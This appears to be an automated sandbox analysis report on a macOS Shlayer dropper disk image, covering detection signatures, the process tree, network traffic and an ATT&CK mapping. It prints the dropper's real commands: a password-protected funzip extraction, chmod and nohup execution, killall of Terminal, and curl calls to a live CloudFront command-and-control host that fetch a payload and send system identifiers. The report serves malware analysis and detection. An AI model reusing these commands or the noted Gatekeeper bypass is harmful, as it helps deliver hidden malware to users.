Loading ...

Play interactive tourEdit tour

Analysis Report Shlayer.dmg

Overview

General Information

Sample Name:Shlayer.dmg
Analysis ID:1440084
MD5:84d9f983d138141294a8ea6711cbc144
SHA1:55869270ed20956e5c3e5533fb4472e4eb533dc2
SHA256:70c6f9da05046525605e2066185929c2659e27a3851dc43d8aa69e2692e6154f
Infos:

Most interesting Screenshot:

Detection

Shlayer
Score:72
Range:0 - 100
Whitelisted:false

Signatures

Script-based application bundle with missing Info.plist (indicative for CVE-2021-30657 bypassing Gatekeeper, File Quarantine and Application Notarization protections)
Yara detected Shlayer
App bundle contains an uncommon file type as the main executable
App bundle contains hidden files/directories
Executes the "funzip" command used for unzipping password protected zips (likely for obfuscating malicious content from detection)
Terminates several processes with shell command 'killall'
Contains symbols with suspicious names likely related to encryption
Contains symbols with suspicious names likely related to networking
Executes commands using a shell command-line interpreter
Executes the "chmod" command used to modify permissions
Executes the "curl" command used to transfer data via the network (typically using HTTP/S)
Executes the "defaults" command used to read or modify user specific settings
Executes the "mktemp" command used to create a temporary unique file name
Executes the "nohup" (no hangup) command used to avoid background terminal process from being killed
Executes the "system_profiler" command used to collect detailed system hardware and software information
Many shell processes execute programs via execve syscall (might be indicative for malicious behavior)
Queries for attached disk images with shell command 'hdiutil'
Queries the macOS product version
Reads hardware related sysctl values
Reads the sysctl hardware model value (might be used for detecting VM presence)
Reads the systems hostname
Writes 64-bit Mach-O files to disk

Classification

Startup

  • System is mac-mojave
  • 1302 (MD5: 22531fba10b6359550cca00ab0be1d2c) Arguments: /Volumes/Installer/yWnBJLaF/1302.app/Contents/MacOS/1302 -psn_0_192559
    • bash New Fork (PID: 966, Parent: 965)
    • mktemp (MD5: 295fb8cee272a251f798cc4b1a713251) Arguments: mktemp -t Installer
    • bash New Fork (PID: 967, Parent: 965)
    • tail (MD5: 8da775e17235dcf5bbd46d1f016aab59) Arguments: tail -c 58853 /Volumes/Installer/yWnBJLaF/1302.app/Contents/MacOS/1302
    • bash New Fork (PID: 968, Parent: 965)
    • funzip (MD5: 87424b028867bea6560cc590720f84d7) Arguments: funzip -1uD9jgw
    • bash New Fork (PID: 969, Parent: 965)
      • bash New Fork (PID: 970, Parent: 969)
      • chmod (MD5: d7df83ea3a49de5d07e0c1730e910852) Arguments: chmod +x /var/folders/38/zm_ty_1144zdsp848dlcj5mw0000gn/T/Installer.q2a1KRHS
      • bash New Fork (PID: 972, Parent: 969)
      • nohup (MD5: 05e181cb915d336de670a1fcad509435) Arguments: nohup /var/folders/38/zm_ty_1144zdsp848dlcj5mw0000gn/T/Installer.q2a1KRHS
      • Installer.q2a1KRHS (MD5: 1a06144fdbc2b7f4dab172bb89a36cef) Arguments: /var/folders/38/zm_ty_1144zdsp848dlcj5mw0000gn/T/Installer.q2a1KRHS
        • sh New Fork (PID: 973, Parent: 972)
        • defaults (MD5: 36a61540ce99d6c9303a62405fea340f) Arguments: defaults read /System/Library/CoreServices/SystemVersion.plist ProductVersion
        • sh New Fork (PID: 974, Parent: 972)
          • sh New Fork (PID: 975, Parent: 974)
          • system_profiler (MD5: de1aa7b1e123ef5ba1b076a085bbcece) Arguments: system_profiler SPHardwareDataType
          • sh New Fork (PID: 976, Parent: 974)
          • awk (MD5: 434e28a3f230b6e0b1e8ff5637213759) Arguments: awk /UUID/ { print $3 }
        • sh New Fork (PID: 978, Parent: 972)
        • sh New Fork (PID: 979, Parent: 972)
          • sh New Fork (PID: 980, Parent: 979)
          • hdiutil (MD5: 6a08ca12fec7ff0315356432b8cfe31b) Arguments: hdiutil info -plist
          • sh New Fork (PID: 981, Parent: 979)
          • perl (MD5: af70985160b8e3f7b57fde159665e36c) Arguments: perl -0777pe s|<data>\s*(.*?)\s*</data>|<string>$1</string>|gs
          • perl5.18 (MD5: 18ce3464a277a0f79a21935a03f1f9d5) Arguments: perl -0777pe s|<data>\s*(.*?)\s*</data>|<string>$1</string>|gs
          • sh New Fork (PID: 982, Parent: 979)
          • plutil (MD5: 1c2f3fe5fdcbb3b7b386088f70a385c1) Arguments: plutil -convert json -r -o - -- -
        • sh New Fork (PID: 983, Parent: 972)
          • sh New Fork (PID: 984, Parent: 983)
          • curl (MD5: 28fe026db67bee7a3e38a3e32ef21241) Arguments: curl -L http://d3vav6z7pfe066.cloudfront.net/slg?s=DFF83C0E-1D4B-41BD-8272-9BEF24509BE3&c=0&gs=1
        • sh New Fork (PID: 985, Parent: 972)
          • sh New Fork (PID: 986, Parent: 985)
          • curl (MD5: 28fe026db67bee7a3e38a3e32ef21241) Arguments: curl -L http://d3vav6z7pfe066.cloudfront.net/slg?s=DFF83C0E-1D4B-41BD-8272-9BEF24509BE3&c=1&gs=1
        • sh New Fork (PID: 987, Parent: 972)
          • sh New Fork (PID: 988, Parent: 987)
          • curl (MD5: 28fe026db67bee7a3e38a3e32ef21241) Arguments: curl -f0L -o /tmp/DFF83C0E-1D4B-41BD-8272-9BEF24509BE3/D9041C65-22CD-48DA-AA67-637812F92C06 http://d3vav6z7pfe066.cloudfront.net/sd/?c=3mlybQ==&u=FB2C97C6-63F5-5D81-A93F-BA4895BD7046&s=DFF83C0E-1D4B-41BD-8272-9BEF24509BE3&o=10.14.4&b=12745028138&gs=1
        • sh New Fork (PID: 989, Parent: 972)
          • sh New Fork (PID: 990, Parent: 989)
          • curl (MD5: 28fe026db67bee7a3e38a3e32ef21241) Arguments: curl -L http://d3vav6z7pfe066.cloudfront.net/slg?s=DFF83C0E-1D4B-41BD-8272-9BEF24509BE3&c=3&gs=1
    • bash New Fork (PID: 971, Parent: 965)
    • killall (MD5: ca9725d13691858b17d910f4a50ba04c) Arguments: killall Terminal
  • cleanup

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
1302JoeSecurity_Shlayer_2Yara detected ShlayerJoe Security

    Signature Overview

    Click to jump to signature section

    Show All Signature Results
    Source: dropped file Installer.q2a1KRHS.297.drMach-O symbol: _CCCrypt
    Source: global trafficHTTP traffic detected: GET /slg?s=DFF83C0E-1D4B-41BD-8272-9BEF24509BE3&c=0&gs=1 HTTP/1.1Host: d3vav6z7pfe066.cloudfront.netUser-Agent: curl/7.54.0Accept: */*
    Source: global trafficHTTP traffic detected: GET /slg?s=DFF83C0E-1D4B-41BD-8272-9BEF24509BE3&c=1&gs=1 HTTP/1.1Host: d3vav6z7pfe066.cloudfront.netUser-Agent: curl/7.54.0Accept: */*
    Source: global trafficHTTP traffic detected: GET /sd/?c=3mlybQ==&u=FB2C97C6-63F5-5D81-A93F-BA4895BD7046&s=DFF83C0E-1D4B-41BD-8272-9BEF24509BE3&o=10.14.4&b=12745028138&gs=1 HTTP/1.0Host: d3vav6z7pfe066.cloudfront.netUser-Agent: curl/7.54.0Accept: */*
    Source: global trafficHTTP traffic detected: GET /slg?s=DFF83C0E-1D4B-41BD-8272-9BEF24509BE3&c=3&gs=1 HTTP/1.1Host: d3vav6z7pfe066.cloudfront.netUser-Agent: curl/7.54.0Accept: */*
    Source: unknownDNS traffic detected: queries for: d3vav6z7pfe066.cloudfront.net
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlContent-Length: 1245Connection: closeCache-Control: no-cache, no-storePragma: no-cacheExpires: -1Server: Microsoft-IIS/7.5Access-Control-Allow-Origin: *X-AspNet-Version: 4.0.30319p3p: CP="CAO PSA OUR"Date: Wed, 28 Apr 2021 08:02:06 GMTX-Cache: Error from cloudfrontVia: 1.1 4809763494a078a525dc1a2dff5ddf6c.cloudfront.net (CloudFront)X-Amz-Cf-Pop: FRA53-C1X-Amz-Cf-Id: EKb96V9Hg_WLxo8MSM04zh0ql32i-BswzYDBFD5T233DhhbXqrw05g==Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 6
    Source: 1302, 00000965.00000291.1.000000010e70d000.000000010e717000.r--.sdmpString found in binary or memory: http://crl.apple.com/codesigning.crl0
    Source: 1302, 00000965.00000291.1.000000010e70d000.000000010e717000.r--.sdmpString found in binary or memory: http://www.apple.com/DTDs/PropertyList-1.0.dtd
    Source: 1302, 00000965.00000291.1.000000010e70d000.000000010e717000.r--.sdmpString found in binary or memory: http://www.apple.com/appleca/root.crl0
    Source: 1302, 00000965.00000291.1.000000010e70d000.000000010e717000.r--.sdmpString found in binary or memory: http://www.apple.com/certificateauthority0
    Source: 1302, 00000965.00000291.1.000000010e70d000.000000010e717000.r--.sdmpString found in binary or memory: https://www.apple.com/appleca/0
    Source: classification engineClassification label: mal72.troj.evad.macDMG@0/5@1/0
    Source: dropped file Installer.q2a1KRHS.297.drMach-O symbol: __ZTISt12domain_error
    Source: dropped file Installer.q2a1KRHS.297.drMach-O symbol: __ZTVSt12domain_error
    Source: dropped file Installer.q2a1KRHS.297.drMach-O symbol: __ZNSt12domain_errorD1Ev

    Persistence and Installation Behavior:

    barindex
    Terminates several processes with shell command 'killall'Show sources
    Source: /bin/bash (PID: 971)Killall command executed: killall TerminalJump to behavior
    Source: /var/folders/38/zm_ty_1144zdsp848dlcj5mw0000gn/T/Installer.q2a1KRHS (PID: 972)Shell command executed: sh -c defaults read /System/Library/CoreServices/SystemVersion.plist ProductVersionJump to behavior
    Source: /var/folders/38/zm_ty_1144zdsp848dlcj5mw0000gn/T/Installer.q2a1KRHS (PID: 972)Shell command executed: sh -c system_profiler SPHardwareDataType | awk '/UUID/ { print $3 }'Jump to behavior
    Source: /var/folders/38/zm_ty_1144zdsp848dlcj5mw0000gn/T/Installer.q2a1KRHS (PID: 972)Shell command executed: sh -c for FILE in /Volumes/Installer/*/*.app do echo '${FILE}' break doneJump to behavior
    Source: /var/folders/38/zm_ty_1144zdsp848dlcj5mw0000gn/T/Installer.q2a1KRHS (PID: 972)Shell command executed: sh -c hdiutil info -plist | perl -0777pe 's|<data>\s*(.*?)\s*</data>|<string>$1</string>|gs' | plutil -convert json -r -o - -- -Jump to behavior
    Source: /var/folders/38/zm_ty_1144zdsp848dlcj5mw0000gn/T/Installer.q2a1KRHS (PID: 972)Shell command executed: sh -c curl -L 'http://d3vav6z7pfe066.cloudfront.net/slg?s=DFF83C0E-1D4B-41BD-8272-9BEF24509BE3&c=0&gs=1' > /dev/null 2>&1Jump to behavior
    Source: /var/folders/38/zm_ty_1144zdsp848dlcj5mw0000gn/T/Installer.q2a1KRHS (PID: 972)Shell command executed: sh -c curl -L 'http://d3vav6z7pfe066.cloudfront.net/slg?s=DFF83C0E-1D4B-41BD-8272-9BEF24509BE3&c=1&gs=1' > /dev/null 2>&1Jump to behavior
    Source: /var/folders/38/zm_ty_1144zdsp848dlcj5mw0000gn/T/Installer.q2a1KRHS (PID: 972)Shell command executed: sh -c curl -f0L -o /tmp/DFF83C0E-1D4B-41BD-8272-9BEF24509BE3/D9041C65-22CD-48DA-AA67-637812F92C06 'http://d3vav6z7pfe066.cloudfront.net/sd/?c=3mlybQ==&u=FB2C97C6-63F5-5D81-A93F-BA4895BD7046&s=DFF83C0E-1D4B-41BD-8272-9BEF24509BE3&o=10.14.4&b=12745028138&gs=1' > /dev/null 2>&1Jump to behavior
    Source: /var/folders/38/zm_ty_1144zdsp848dlcj5mw0000gn/T/Installer.q2a1KRHS (PID: 972)Shell command executed: sh -c curl -L 'http://d3vav6z7pfe066.cloudfront.net/slg?s=DFF83C0E-1D4B-41BD-8272-9BEF24509BE3&c=3&gs=1' > /dev/null 2>&1Jump to behavior
    Source: /bin/bash (PID: 970)Chmod executable: /bin/chmod -> chmod +x /var/folders/38/zm_ty_1144zdsp848dlcj5mw0000gn/T/Installer.q2a1KRHSJump to behavior
    Source: /bin/sh (PID: 984)Curl executable: /usr/bin/curl -> curl -L http://d3vav6z7pfe066.cloudfront.net/slg?s=DFF83C0E-1D4B-41BD-8272-9BEF24509BE3&c=0&gs=1Jump to behavior
    Source: /bin/sh (PID: 986)Curl executable: /usr/bin/curl -> curl -L http://d3vav6z7pfe066.cloudfront.net/slg?s=DFF83C0E-1D4B-41BD-8272-9BEF24509BE3&c=1&gs=1Jump to behavior
    Source: /bin/sh (PID: 988)Curl executable: /usr/bin/curl -> curl -f0L -o /tmp/DFF83C0E-1D4B-41BD-8272-9BEF24509BE3/D9041C65-22CD-48DA-AA67-637812F92C06 http://d3vav6z7pfe066.cloudfront.net/sd/?c=3mlybQ==&u=FB2C97C6-63F5-5D81-A93F-BA4895BD7046&s=DFF83C0E-1D4B-41BD-8272-9BEF24509BE3&o=10.14.4&b=12745028138&gs=1Jump to behavior
    Source: /bin/sh (PID: 990)Curl executable: /usr/bin/curl -> curl -L http://d3vav6z7pfe066.cloudfront.net/slg?s=DFF83C0E-1D4B-41BD-8272-9BEF24509BE3&c=3&gs=1Jump to behavior
    Source: /bin/bash (PID: 966)Mktemp executable: /usr/bin/mktemp -> mktemp -t InstallerJump to behavior
    Source: /bin/bash (PID: 972)Nohup executable: /usr/bin/nohup -> nohup /var/folders/38/zm_ty_1144zdsp848dlcj5mw0000gn/T/Installer.q2a1KRHSJump to behavior
    Source: /bin/sh (PID: 973)Shell process: defaults read /System/Library/CoreServices/SystemVersion.plist ProductVersionJump to behavior
    Source: /bin/sh (PID: 975)Shell process: system_profiler SPHardwareDataTypeJump to behavior
    Source: /bin/sh (PID: 976)Shell process: awk /UUID/ { print $3 }Jump to behavior
    Source: /bin/sh (PID: 980)Shell process: hdiutil info -plistJump to behavior
    Source: /bin/sh (PID: 981)Shell process: perl -0777pe s|<data>\s*(.*?)\s*</data>|<string>$1</string>|gsJump to behavior
    Source: /bin/sh (PID: 982)Shell process: plutil -convert json -r -o - -- -Jump to behavior
    Source: /bin/sh (PID: 984)Shell process: curl -L http://d3vav6z7pfe066.cloudfront.net/slg?s=DFF83C0E-1D4B-41BD-8272-9BEF24509BE3&c=0&gs=1Jump to behavior
    Source: /bin/sh (PID: 986)Shell process: curl -L http://d3vav6z7pfe066.cloudfront.net/slg?s=DFF83C0E-1D4B-41BD-8272-9BEF24509BE3&c=1&gs=1Jump to behavior
    Source: /bin/sh (PID: 988)Shell process: curl -f0L -o /tmp/DFF83C0E-1D4B-41BD-8272-9BEF24509BE3/D9041C65-22CD-48DA-AA67-637812F92C06 http://d3vav6z7pfe066.cloudfront.net/sd/?c=3mlybQ==&u=FB2C97C6-63F5-5D81-A93F-BA4895BD7046&s=DFF83C0E-1D4B-41BD-8272-9BEF24509BE3&o=10.14.4&b=12745028138&gs=1Jump to behavior
    Source: /bin/sh (PID: 990)Shell process: curl -L http://d3vav6z7pfe066.cloudfront.net/slg?s=DFF83C0E-1D4B-41BD-8272-9BEF24509BE3&c=3&gs=1Jump to behavior
    Source: /bin/sh (PID: 980)Hdiutil command executed: hdiutil info -plistJump to behavior
    Source: /usr/bin/funzip (PID: 968)File written: /private/var/folders/38/zm_ty_1144zdsp848dlcj5mw0000gn/T/Installer.q2a1KRHSJump to dropped file
    Source: /bin/sh (PID: 976)Awk executable: /usr/bin/awk -> awk /UUID/ { print $3 }Jump to behavior
    Source: /usr/bin/perl5.18 (PID: 981)Random device file read: /dev/urandomJump to behavior

    Hooking and other Techniques for Hiding and Protection:

    barindex
    App bundle contains an uncommon file type as the main executableShow sources
    Source: archive file from DMG submissionUncommon file type "Bourne-Again shell script text executable": Installer/yWnBJLaF/1302.app/Contents/MacOS/1302
    App bundle contains hidden files/directoriesShow sources
    Source: archive file from DMG submissionHidden file : Installer/.nFO7evVxM9sjuU.png
    Executes the "funzip" command used for unzipping password protected zips (likely for obfuscating malicious content from detection)Show sources
    Source: /bin/bash (PID: 968)Funzip executable: /usr/bin/funzip -> funzip -1uD9jgwJump to behavior
    Source: /usr/sbin/system_profiler (PID: 977)Sysctl read request: hw.model (6.2)Jump to behavior
    Source: Installer.q2a1KRHS, 00000972.00000305.9.0000000102075000.000000010207b000.r--.sdmpBinary or memory string: framework.vmnet
    Source: Installer.q2a1KRHS, 00000972.00000305.9.0000000102075000.000000010207b000.r--.sdmpBinary or memory string: framework.vmnet$

    HIPS / PFW / Operating System Protection Evasion:

    barindex
    Script-based application bundle with missing Info.plist (indicative for CVE-2021-30657 bypassing Gatekeeper, File Quarantine and Application Notarization protections)Show sources
    Source: submission archive DMGScript file without a corresponding application bundle Info.plist: Installer/yWnBJLaF/1302.app/Contents/MacOS/1302
    Source: /bin/sh (PID: 973)Defaults executable: /usr/bin/defaults defaults read /System/Library/CoreServices/SystemVersion.plist ProductVersionJump to behavior
    Source: /usr/sbin/system_profiler (PID: 977)Sysctl read request: hw.cpu_freq (6.15)Jump to behavior
    Source: /usr/sbin/system_profiler (PID: 977)Sysctl read request: hw.memsize (6.24)Jump to behavior
    Source: /Volumes/Installer/yWnBJLaF/1302.app/Contents/MacOS/1302 (PID: 965)Sysctl requested: kern.hostname (1.10)Jump to behavior
    Source: /bin/sh (PID: 973)Sysctl requested: kern.hostname (1.10)Jump to behavior
    Source: /bin/sh (PID: 974)Sysctl requested: kern.hostname (1.10)Jump to behavior
    Source: /bin/sh (PID: 978)Sysctl requested: kern.hostname (1.10)Jump to behavior
    Source: /bin/sh (PID: 979)Sysctl requested: kern.hostname (1.10)Jump to behavior
    Source: /bin/sh (PID: 983)Sysctl requested: kern.hostname (1.10)Jump to behavior
    Source: /bin/sh (PID: 985)Sysctl requested: kern.hostname (1.10)Jump to behavior
    Source: /bin/sh (PID: 987)Sysctl requested: kern.hostname (1.10)Jump to behavior
    Source: /bin/sh (PID: 989)Sysctl requested: kern.hostname (1.10)Jump to behavior
    Source: /bin/sh (PID: 973)Defaults executable: /usr/bin/defaults defaults read /System/Library/CoreServices/SystemVersion.plist ProductVersionJump to behavior

    Stealing of Sensitive Information:

    barindex
    Yara detected ShlayerShow sources
    Source: Yara matchFile source: 1302, type: SAMPLE
    Source: /bin/sh (PID: 975)System_profiler executable: /usr/sbin/system_profiler system_profiler SPHardwareDataTypeJump to behavior
    Source: /usr/sbin/system_profiler (PID: 975)System_profiler executable: /usr/sbin/system_profiler /usr/sbin/system_profiler -nospawn -xml SPHardwareDataType -detailLevel fullJump to behavior

    Remote Access Functionality:

    barindex
    Yara detected ShlayerShow sources
    Source: Yara matchFile source: 1302, type: SAMPLE

    Mitre Att&ck Matrix

    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
    Valid AccountsCommand and Scripting Interpreter11Path InterceptionPath InterceptionMasquerading2OS Credential DumpingSecurity Software Discovery11Remote ServicesData from Local SystemData Encrypted1Ingress Tool Transfer3Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
    Default AccountsScripting1Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsHide Artifacts1LSASS MemoryVirtualization/Sandbox Evasion1Remote Desktop ProtocolData from Removable MediaExfiltration Over Alternative Protocol1Non-Application Layer Protocol3Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
    Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion1Security Account ManagerSystem Information Discovery6SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationApplication Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)File and Directory Permissions Modification1NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
    Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptScripting1LSA SecretsRemote System DiscoverySSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
    Replication Through Removable MediaLaunchdRc.commonRc.commonHidden Files and Directories2Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
    External Remote ServicesScheduled TaskStartup ItemsStartup ItemsGatekeeper Bypass1DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Number of created Files
    • Shell
    • Is malicious
    • Internet
    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1440084 Sample: Shlayer.dmg Startdate: 28/04/2021 Architecture: MAC Score: 72 57 d3vav6z7pfe066.cloudfront.net 143.204.214.77, 49466, 49467, 49468 AMAZON-02US United States 2->57 63 Script-based application bundle with missing Info.plist (indicative for CVE-2021-30657 bypassing Gatekeeper, File Quarantine and Application Notarization protections) 2->63 65 Yara detected Shlayer 2->65 67 App bundle contains an uncommon file type as the main executable 2->67 69 App bundle contains hidden files/directories 2->69 11 xpcproxy 1302 2->11         started        signatures3 process4 process5 13 bash 11->13         started        15 bash funzip 11->15         started        19 bash killall 11->19         started        21 2 other processes 11->21 file6 23 bash nohup Installer.q2a1KRHS 13->23         started        25 bash chmod 13->25         started        55 /private/var/folde.../Installer.q2a1KRHS, Mach-O 15->55 dropped 59 Executes the "funzip" command used for unzipping password protected zips (likely for obfuscating malicious content from detection) 15->59 61 Terminates several processes with shell command 'killall' 19->61 signatures7 process8 process9 27 sh 23->27         started        29 sh 23->29         started        31 sh 23->31         started        33 5 other processes 23->33 process10 35 sh perl perl5.18 27->35         started        37 sh hdiutil 27->37         started        39 sh plutil 27->39         started        41 sh system_profiler 29->41         started        43 sh awk 29->43         started        45 sh curl 31->45         started        47 sh curl 33->47         started        49 sh curl 33->49         started        51 sh curl 33->51         started        process11 53 system_profiler 41->53         started       

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.